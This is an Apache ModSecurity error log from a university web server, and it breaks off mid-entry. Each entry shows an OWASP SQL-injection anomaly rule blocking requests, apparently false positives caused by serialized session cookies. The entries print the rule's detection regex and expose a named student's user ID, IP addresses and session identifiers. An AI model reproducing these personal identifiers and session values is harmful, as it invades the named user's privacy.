[Mon Aug 28 23:54:53.130216 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRXcCo-f0AANnDyPEAAAAD"]
[Mon Aug 28 23:54:54.866612 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRXsCo-f0AANnDyPIAAAAD"]
[Mon Aug 28 23:54:54.993281 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRXsCo-f0AANnDyPMAAAAD"]
[Mon Aug 28 23:54:56.530383 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRYMCo-f0AANnDyPQAAAAD"]
[Mon Aug 28 23:54:56.654387 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRYMCo-f0AANnDyPUAAAAD"]
[Mon Aug 28 23:54:57.770511 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRYcCo-f0AANnDyPYAAAAD"]
[Mon Aug 28 23:54:57.903654 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRYcCo-f0AANnDyPcAAAAD"]
[Mon Aug 28 23:54:58.842561 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRYsCo-f0AANnDyPgAAAAD"]
[Mon Aug 28 23:54:58.974595 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRYsCo-f0AANnDyPkAAAAD"]
[Mon Aug 28 23:55:17.043829 2023] [:error] [pid 55746] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRdcCo-f0AANnCdG4AAAAM"]
[Mon Aug 28 23:55:17.542184 2023] [:error] [pid 55746] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRdcCo-f0AANnCdG8AAAAM"]
[Mon Aug 28 23:55:22.214462 2023] [:error] [pid 55746] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzResCo-f0AANnCdHAAAAAM"]
[Mon Aug 28 23:56:01.217276 2023] [:error] [pid 55747] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOzRocCo-f0AANnDyP0AAAAD"]
[Mon Aug 28 23:56:01.404932 2023] [:error] [pid 55744] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOzRocCo-f0AANnAl9YAAAAF"]
[Mon Aug 28 23:56:01.411964 2023] [:error] [pid 55793] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOzRocCo-f0AANnxyM0AAAAN"]
[Mon Aug 28 23:56:01.442458 2023] [:error] [pid 55746] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOzRocCo-f0AANnCdHMAAAAM"]
[Mon Aug 28 23:56:02.479895 2023] [:error] [pid 55877] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOzRosCo-f0AANpFqQoAAAAR"]
[Mon Aug 28 23:56:02.480794 2023] [:error] [pid 55878] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOzRosCo-f0AANpGP5gAAAAS"]
[Mon Aug 28 23:56:02.540648 2023] [:error] [pid 55878] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: 